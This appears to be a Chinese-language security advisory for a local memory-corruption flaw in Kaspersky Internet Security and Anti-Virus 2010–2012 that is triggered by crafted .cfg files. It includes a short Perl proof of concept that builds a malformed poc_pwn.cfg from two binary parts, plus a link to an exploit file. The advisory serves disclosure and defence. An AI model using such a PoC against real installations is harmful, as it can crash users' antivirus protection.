Kaspersky Internet Security/Anti-Virus ".cfg"文件处理内存破坏漏洞
发布日期:2011-12-21
更新日期:2011-12-22
受影响系统:Kaspersky Labs Kaspersky Antivirus 2012
Kaspersky Labs Kaspersky Antivirus 2011
Kaspersky Labs Kaspersky Antivirus 2010
Kaspersky Labs Kaspersky Antivirus
Kaspersky Labs Kaspersky Internet Security 2012
Kaspersky Labs Kaspersky Internet Security 2011
Kaspersky Labs Kaspersky Internet Security 2010
描述:
BUGTRAQ ID:
51161
Kaspersky Internet Security套件是一套完整的解决方案,用于保护计算机抵御几乎所有来自互联网的主要的威胁。Kaspersky Antivirus是非常流行的杀毒软件。
Kaspersky Internet Security/Anti-Virus在处理特制.cfg文件时存在本地内存破坏漏洞,本地攻击者可利用此漏洞造成受影响应用崩溃,拒绝服务合法用户。
<*来源:Benjamin K.M.
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Benjamin K.M. ()提供了如下测试方法:
http://downloads.securityfocus.com/vulnerabilities/exploits/51161.txt
Proof of Concept:
=================
The vulnerability can be exploited by local attackers via import or remote attacker via user inter action.
For demonstration or reproduce ...
#!/usr/bin/perl
##############################################################################
my $code="corrupt" x 1;
###################################################################
$FH1 = "file1";
$FilePath1 = "part1.bin";
$FH2 = "file2";
$FilePath2 = "part2.bin";
###################################################################
open(myfile,'>> poc_pwn.cfg');
binmode myfile;
###################################################################
open(FH1, $FilePath1);
binmode FH1;
while (<FH1>) {
print myfile;
}
close(FH1);
print myfile $code;
open(FH2, $FilePath2);
binmode FH2;
while (<FH2>) {
print myfile;
}
close(FH2);
###################################################################
PoC:
../PoC/kis&kav_2011_2012_p0c.pl
../PoC/part1.bin
../PoC/part2.bin
建议:
厂商补丁:
Kaspersky Labs
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.kaspersky.com/浏览次数:2195
严重程度:0(网友投票)
